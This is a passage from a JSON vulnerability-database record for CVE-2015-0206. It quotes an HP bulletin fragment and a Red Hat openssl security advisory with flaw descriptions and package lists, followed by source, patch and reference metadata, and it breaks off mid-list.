in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\nReferences:\n\nCVE-2014-0118 - Remote Denial of Service (DoS)\nCVE-2014-0226 - Remote Denial of Service (DoS)\nCVE-2014-0231 - Remote Denial of Service (DoS)\nCVE-2014-3523 - Remote Denial of Service (DoS)\nCVE-2014-3569 - Remote Denial of Service (DoS)\nCVE-2014-3570 - Remote Disclosure of Information\nCVE-2014-3571 - Remote Denial of Service (DoS)\nCVE-2014-3572 - Remote Disclosure of Information\nCVE-2014-8142 - Remote Code Execution\nCVE-2014-8275 - Unauthorized Modification\nCVE-2014-9427 - Remote Disclosure of Information\nCVE-2014-9652 - Remote Denial of Service (DoS)\nCVE-2014-9653 - Remote Denial of Service (DoS)\nCVE-2014-9705 - Remote Code Execution\nCVE-2015-0204 - Remote Disclosure of Information\nCVE-2015-0205 - Remote Unauthorized Access\nCVE-2015-0206 - Remote Denial of Service (DoS)\nCVE-2015-0207 - Remote Denial of Service (DoS)\nCVE-2015-0208 - Remote Denial of Service (DoS)\nCVE-2015-0209 - Remote Denial of Service (DoS)\nCVE-2015-0231 - Remote Denial of Service (DoS)\nCVE-2015-0232 - Remote Denial of Service (DoS), Execution of Arbitrary Code\nCVE-2015-0273 - Remote Execution of Arbitrary Code\nCVE-2015-0285 - Remote Disclosure of Information\nCVE-2015-0286 - Remote Denial of Service (DoS)\nCVE-2015-0287 - Remote Denial of Service (DoS)\nCVE-2015-0288 - Remote Denial of Service (DoS)\nCVE-2015-0289 - Remote Denial of Service (DoS)\nCVE-2015-0290 - Remote Denial of Service (DoS)\nCVE-2015-0291 - Remote Denial of Service (DoS)\nCVE-2015-0292 - Remote Denial of Service (DoS)\nCVE-2015-0293 - Remote Denial of Service (DoS)\nCVE-2015-1787 - Remote Denial of Service (DoS)\nCVE-2015-2301 - Remote Execution of Arbitrary Code\nCVE-2015-2331 - Remote Denial of Service (DoS), Execution of Arbitrary Code\nCVE-2015-2348 - Unauthorized Modification\nCVE-2015-2787 - Remote Execution of Arbitrary Code\nCVE-2015-2134 - Cross-site Request Forgery (CSRF)\nSSRT102109\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: openssl security update\nAdvisory ID: RHSA-2015:0066-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-0066.html\nIssue date: 2015-01-20\nUpdated on: 2015-01-21\nCVE Names: CVE-2014-3570 CVE-2014-3571 CVE-2014-3572 \n CVE-2014-8275 CVE-2015-0204 CVE-2015-0205 \n CVE-2015-0206 \n=====================================================================\n\n1. Summary:\n\nUpdated openssl packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6 and 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),\nTransport Layer Security (TLS), and Datagram Transport Layer Security\n(DTLS) protocols, as well as a full-strength, general purpose cryptography\nlibrary. \n\nA NULL pointer dereference flaw was found in the DTLS implementation of\nOpenSSL. A remote attacker could send a specially crafted DTLS message,\nwhich would cause an OpenSSL server to crash. (CVE-2014-3571)\n\nA memory leak flaw was found in the way the dtls1_buffer_record() function\nof OpenSSL parsed certain DTLS messages. A remote attacker could send\nmultiple specially crafted DTLS messages to exhaust all available memory of\na DTLS server. (CVE-2015-0206)\n\nIt was found that OpenSSL\u0027s BigNumber Squaring implementation could produce\nincorrect results under certain special conditions. This flaw could\npossibly affect certain OpenSSL library functionality, such as RSA\nblinding. Note that this issue occurred rarely and with a low probability,\nand there is currently no known way of exploiting it. (CVE-2014-3570)\n\nIt was discovered that OpenSSL would perform an ECDH key exchange with a\nnon-ephemeral key even when the ephemeral ECDH cipher suite was selected. \nA malicious server could make a TLS/SSL client using OpenSSL use a weaker\nkey exchange method than the one requested by the user. (CVE-2014-3572)\n\nIt was discovered that OpenSSL would accept ephemeral RSA keys when using\nnon-export RSA cipher suites. A malicious server could make a TLS/SSL\nclient using OpenSSL use a weaker key exchange method. (CVE-2015-0204)\n\nMultiple flaws were found in the way OpenSSL parsed X.509 certificates. \nAn attacker could use these flaws to modify an X.509 certificate to produce\na certificate with a different fingerprint without invalidating its\nsignature, and possibly bypass fingerprint-based blacklisting in\napplications. (CVE-2014-8275)\n\nIt was found that an OpenSSL server would, under certain conditions, accept\nDiffie-Hellman client certificates without the use of a private key. \nAn attacker could use a user\u0027s client certificate to authenticate as that\nuser, without needing the private key. (CVE-2015-0205)\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to mitigate the above issues. For the update to\ntake effect, all services linked to the OpenSSL library (such as httpd and\nother SSL-enabled services) must be restarted or the system rebooted. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata \nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at \nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1180184 - CVE-2015-0204 openssl: Only allow ephemeral RSA keys in export ciphersuites\n1180185 - CVE-2014-3572 openssl: ECDH downgrade bug fix\n1180187 - CVE-2014-8275 openssl: Fix various certificate fingerprint issues\n1180234 - CVE-2014-3571 openssl: DTLS segmentation fault in dtls1_get_record\n1180235 - CVE-2015-0206 openssl: DTLS memory leak in dtls1_buffer_record\n1180239 - CVE-2015-0205 openssl: DH client certificates accepted without verification\n1180240 - CVE-2014-3570 openssl: Bignum squaring may produce incorrect results\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl-1.0.1e-30.el6_6.5.src.rpm\n\ni386:\nopenssl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-static-1.0.1e-30.el6_6.5.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-static-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssl-1.0.1e-30.el6_6.5.src.rpm\n\nx86_64:\nopenssl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-static-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl-1.0.1e-30.el6_6.5.src.rpm\n\ni386:\nopenssl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.i686.rpm\n\nppc64:\nopenssl-1.0.1e-30.el6_6.5.ppc.rpm\nopenssl-1.0.1e-30.el6_6.5.ppc64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.ppc.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.ppc.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-30.el6_6.5.s390.rpm\nopenssl-1.0.1e-30.el6_6.5.s390x.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.s390.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.s390.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-static-1.0.1e-30.el6_6.5.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.ppc64.rpm\nopenssl-static-1.0.1e-30.el6_6.5.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.s390x.rpm\nopenssl-static-1.0.1e-30.el6_6.5.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-static-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl-1.0.1e-30.el6_6.5.src.rpm\n\ni386:\nopenssl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-static-1.0.1e-30.el6_6.5.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-static-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.7.src.rpm\n\nppc64:\nopenssl-1.0.1e-34.el7_0.7.ppc64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.ppc.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.ppc64.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.ppc.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-34.el7_0.7.s390x.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.s390.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.s390x.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.s390.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm\nopenssl-perl-1.0.1e-34.el7_0.7.ppc64.rpm\nopenssl-static-1.0.1e-34.el7_0.7.ppc.rpm\nopenssl-static-1.0.1e-34.el7_0.7.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm\nopenssl-perl-1.0.1e-34.el7_0.7.s390x.rpm\nopenssl-static-1.0.1e-34.el7_0.7.s390.rpm\nopenssl-static-1.0.1e-34.el7_0.7.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-3570\nhttps://access.redhat.com/security/cve/CVE-2014-3571\nhttps://access.redhat.com/security/cve/CVE-2014-3572\nhttps://access.redhat.com/security/cve/CVE-2014-8275\nhttps://access.redhat.com/security/cve/CVE-2015-0204\nhttps://access.redhat.com/security/cve/CVE-2015-0205\nhttps://access.redhat.com/security/cve/CVE-2015-0206\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://www.openssl.org/news/secadv_20150108.txt\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFUwCWMXlSAg2UNWIIRAioBAJ4/RjG4OGXzCwg+PJJWNqyvahe3rQCeNE+X\nENFobdxQdJ+gVAiRe8Qf54A=\n=wyAg\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n", "sources": [ { "db": "NVD", "id": "CVE-2015-0206" }, { "db": "BID", "id": "71940" }, { "db": "VULMON", "id": "CVE-2015-0206" }, { "db": "PACKETSTORM", "id": "133318" }, { "db": "PACKETSTORM", "id": "133316" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "129893" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "132763" }, { "db": "PACKETSTORM", "id": "130051" } ], "trust": 1.89 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-0206", "trust": 2.7 }, { "db": "BID", "id": "71940", "trust": 1.4 }, { "db": "MCAFEE", "id": "SB10102", "trust": 1.1 }, { "db": "MCAFEE", "id": "SB10108", "trust": 1.1 }, { "db": "BID", "id": "91787", "trust": 1.1 }, { "db": "SECTRACK", "id": "1033378", "trust": 1.1 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.4252", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201501-173", "trust": 0.6 }, { "db": "VULMON", "id": "CVE-2015-0206", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133318", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133316", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130987", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129893", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133325", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132763", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130051", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-0206" }, { "db": "BID", "id": "71940" }, { "db": "PACKETSTORM", "id": "133318" }, { "db": "PACKETSTORM", "id": "133316" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "129893" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "132763" }, { "db": "PACKETSTORM", "id": "130051" }, { "db": "CNNVD", "id": "CNNVD-201501-173" }, { "db": "NVD", "id": "CVE-2015-0206" } ] }, "id": "VAR-201501-0340", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.396927715 }, "last_update_date": "2024-07-23T20:50:41.225000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "openssl-1.0.0p", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=53190" }, { "title": "openssl-0.9.8zd", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=53189" }, { "title": "openssl-1.0.1k.tar.gz", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=53191" }, { "title": "Red Hat: Moderate: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20150066 - security advisory" }, { "title": "Red Hat: CVE-2015-0206", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-0206" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2459-1" }, { "title": "Debian Security Advisories: DSA-3125-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=a3210fee56d96657bbff4ad44c3d0807" }, { "title": "Tenable Security Advisories: [R7] OpenSSL \u002720150108\u0027 Advisory Affects Tenable Products", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2015-03" }, { "title": "Amazon Linux AMI: ALAS-2015-469", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-469" }, { "title": "Symantec Security Advisories: SA88 : OpenSSL Security Advisory 08-Jan-2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=9281dc3b1a760e1cf2711cdf82cf64d7" }, { "title": "Cisco: Multiple Vulnerabilities in OpenSSL (January 2015) Affecting Cisco Products", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20150310-ssl" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4b527561ba1a5de7a529c8a93679f585" }, { "title": "Splunk Security Announcements: Splunk response to January 2015 OpenSSL vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=splunk_security_announcements\u0026qid=21b119528a2fb8c78850a17027b71424" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - January 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=eaf98750f1130c39e83765575c69e165" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=744c19dc9f4f70ad58059bf8733ec9c1" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=459961024c4bdce7bb3a1a40a65a6f2e" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489" }, { "title": "The Register", "trust": 0.1, "url": "https://www.theregister.co.uk/2015/01/09/dead_openssl_bugs_more_fleas_than_poodles/" } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-0206" }, { "db": "CNNVD", "id": "CNNVD-201501-173" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2015-0206" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.5, "url": "https://www.openssl.org/news/secadv_20150108.txt" }, { "trust": 1.4, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20150310-ssl" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2015-0066.html" }, { "trust": 1.1, "url": "https://github.com/openssl/openssl/commit/103b171d8fc282ef435f8de9afbf7782e312961f" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-january/147938.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-january/148363.html" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:019" }, { "trust": 1.1, "url": "http://www.debian.org/security/2015/dsa-3125" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00021.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142721102728110\u0026w=2" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:062" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00026.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/91787" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050297101809\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050205101530\u0026w=2" }, { "trust": 1.1, "url": 